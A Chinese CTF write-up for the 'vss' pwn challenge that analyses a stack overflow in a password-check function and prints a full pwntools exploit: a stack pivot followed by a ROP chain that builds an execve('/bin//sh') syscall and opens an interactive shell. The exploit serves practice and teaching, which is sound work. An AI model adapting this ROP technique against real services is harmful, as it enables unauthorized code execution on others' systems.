pwn练习2--vss

作者: SueLyon | 来源:发表于2018-08-19 11:28 被阅读0次

pwn练习2--vss
CTF PWN之精确覆盖变量数据
2019-05-30 新手练习区完结
新手科普 | CTF PWN堆溢出总结
MCTF pwn
什么是pwn/二进制溢出
adworld pwn 题解
pwn练习3--shitsco
攻防世界新手练习pwn
安恒一月赛2019 PWN

题目

题目.png

程序需要输入pw，10s后自动退出

保护措施：

checksec.png

二进制分析：
ida分析
由于该程序为静态链接，每个函数功能需要去分析
程序主函数

main.png

check函数

check.png

其中memcpy缓冲区为0x50，输入参数为0x48，此时可覆盖返回地址
如图，内存地址：0x18343ee8

stack.png

若输入前两位为'p'和'y'就直接返回1
不然就逐位与0x66异或与pass.enc文件比较，流程一比较好操作

check2.png

又由于可控可执行的栈空间只有一行（8个字节），所以要调整栈的位置，到下面栈帧的空间里去利用（有400h的空间），之后就可以构造ropchain

可利用工具寻找add esp，ret 和 ropchain

ROPgadget --binary vss --ropchain

找到add esp，ret

44892a.png

可构造payload，exp如下：

exp:

from pwn import *
from struct import pack
p = remote('127.0.0.1',4000)
recv_content = p.recvuntil('Password:\n')
p2 = ''
p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret
p2 += pack('<Q', 0x00000000006c4080) # @ .data
p2 += pack('<Q', 0x000000000046f208) # pop2 rax ; ret
p2 += '/bin//sh'
p2 += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret
p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret
p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8
p2 += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret
p2 += pack('<Q', 0x000000000046b8d1) # mov qword ptr [rsi], rax ; ret
p2 += pack('<Q', 0x0000000000401823) # pop2 rdi ; ret
p2 += pack('<Q', 0x00000000006c4080) # @ .data
p2 += pack('<Q', 0x0000000000401937) # pop2 rsi ; ret
p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8
p2 += pack('<Q', 0x000000000043ae05) # pop2 rdx ; ret
p2 += pack('<Q', 0x00000000006c4088) # @ .data + 8
p2 += pack('<Q', 0x000000000041bd1f) # xor rax, rax ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045e790) # add rax, 1 ; ret
p2 += pack('<Q', 0x000000000045f2a5) # syscall ; ret
payload1 = 'py' + 'A' * (0x4e - 0x8) + p64(0x000000000044892a) + 'A' * (0xd0 - 0x50) + p2
p.sendline(payload1)
p.interactive()

测试：

test.png